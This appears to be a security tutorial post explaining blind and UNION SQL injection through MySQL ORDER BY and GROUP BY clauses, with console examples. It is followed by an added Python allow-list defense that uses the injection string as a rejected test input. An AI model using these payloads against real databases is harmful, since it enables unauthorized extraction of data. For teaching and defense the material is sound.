Injection in Order by, Group by Clause

Exploiting SQL injection when the input lands in the ORDER BY clause is a bit tricky, because a UNION query is not permitted after an ORDER BY clause. The following can be used in that scenario to build blind SQL injection cases: the injected CASE expression evaluates cleanly when the condition is true, but when it is false it multiplies by a subquery that returns more than one row, and the query fails with an error. The true/false answer is therefore visible from whether the query errors:

mysql> select id from news where id =1 order by 1, (select case when (1=1) then 1 else 1*(select table_name from information_schema.tables)end)=1;
+------+
| id   |
+------+
|    1 |
+------+
1 row in set (0.00 sec)

----

mysql> select id from news where id =1 order by 1, (select case when (1=2) then 1 else 1*(select table_name from information_schema.tables)end)=1;
ERROR 1242 (21000): Subquery returns more than 1 row

----

For injections where the user's input goes into the GROUP BY clause, UNION queries can be used, although the technique above also works for blind injection cases:

mysql> select id from news where id =1 group by id union select 2222;
+------+
| id   |
+------+
|    1 |
| 2222 |
+------+
2 rows in set (0.00 sec)
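Both cases above exist because column names in ORDER BY and GROUP BY cannot be passed as bound parameters, so applications concatenate them. The defensive counterpart is an allow-list that maps user-facing sort keys onto fixed identifiers. This is an added example, not part of the original post; the table `news`, its columns and the SQLite backing store are constructed for the demo.

```python
import sqlite3

# Constructed demo schema: API sort key -> real column name. Only these
# identifiers can ever reach the SQL text; anything else is rejected.
SORTABLE = {"id": "id", "title": "title", "date": "created"}
DIRECTIONS = {"asc": "ASC", "desc": "DESC"}


def order_clause(sort: str, direction: str = "asc") -> str:
    """Build an ORDER BY clause from the allow-list, never from raw input."""
    if sort not in SORTABLE or direction.lower() not in DIRECTIONS:
        raise ValueError(f"unsupported sort parameter: {sort!r} {direction!r}")
    return f"ORDER BY {SORTABLE[sort]} {DIRECTIONS[direction.lower()]}"


def group_clause(key: str) -> str:
    """GROUP BY takes identifiers too, so the same allow-list applies."""
    if key not in SORTABLE:
        raise ValueError(f"unsupported group parameter: {key!r}")
    return f"GROUP BY {SORTABLE[key]}"


def _demo_db() -> sqlite3.Connection:
    # Constructed in-memory table standing in for the MySQL 'news' table.
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        "CREATE TABLE news (id INTEGER, title TEXT, created TEXT);"
        "INSERT INTO news VALUES (1, 'b', '2024-01-02'), (2, 'a', '2024-01-01');"
    )
    return conn


def fetch_ids(sort: str, direction: str = "asc") -> list:
    """Hardened query: values are bound, the identifier comes from the allow-list."""
    conn = _demo_db()
    sql = f"SELECT id FROM news WHERE id IN (?, ?) {order_clause(sort, direction)}"
    return [row[0] for row in conn.execute(sql, (1, 2))]


def is_rejected(sort: str) -> bool:
    """True when the allow-list refuses the supplied sort key."""
    try:
        order_clause(sort)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    payload = "1, (select case when (1=1) then 1 else 1*(select table_name from information_schema.tables)end)=1"
    print(fetch_ids("title"), fetch_ids("id", "desc"), is_rejected(payload))
```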